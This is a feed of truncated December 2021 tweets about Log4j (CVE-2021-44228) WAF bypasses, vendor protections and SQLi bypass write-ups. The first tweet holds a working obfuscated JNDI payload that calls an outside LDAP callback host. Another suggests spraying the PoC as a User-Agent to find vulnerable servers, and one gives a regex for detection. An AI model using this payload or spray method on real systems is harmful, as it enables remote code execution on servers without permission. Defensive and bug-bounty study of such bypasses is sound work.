Found a bypass working for a few WAFs
${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//your.burpcollaborator.net/a}
Enjoy bounty season ...December 12, 2021
Hey @MeghBulletin it probably happened due to the Log4j zero-day vulnerability found on Twitter, Steam, iCloud, etc. This has been going on for the past 2 days. The s ...December 12, 2021
There are so many possible bypasses available, I changed the regex to be only ${.*//(.*)} because that's the only real way to be sure! Except I'm still ...December 11, 2021
This is such a silly take. We were seeing WAF bypass attempts in our logs on Thursday, way before Twitter was talking about them.
In fact, talking ab ...December 11, 2021
Just like that, @realgam3 & @nirzigler have updated and enhanced these signatures to provide better coverage on bypass attempts. Thank you for wor ...December 11, 2021
Here is some recent research on how to bypass the current generation of WAF rules trying to block the ongoing Log4j RCE incident. #upgrade
https://t. ...December 11, 2021
How I was able to bypass Cloudflare WAF for SQLi payload https://t.co/ZDMfLitH1J #infosec #infosecurity #cybersecurity #threatintel #threatintelligenc ...December 11, 2021
Open Interactsh. Set the PoC code as the User-Agent and surf around the world. Whoever is vulnerable will then report in. Cloudflare blocks it, but ...December 11, 2021
New write-up on the InfoSec Write-ups publication: "How I was able to bypass Cloudflare WAF for SQLi payload" #bugbounty #bugbountywriteup #bugbountytips ...December 11, 2021
Polaris rolled out protection for our customers using our Web Application & API Protection against the Log4j2 vulnerability (CVE-2021-44228). We have ...December 11, 2021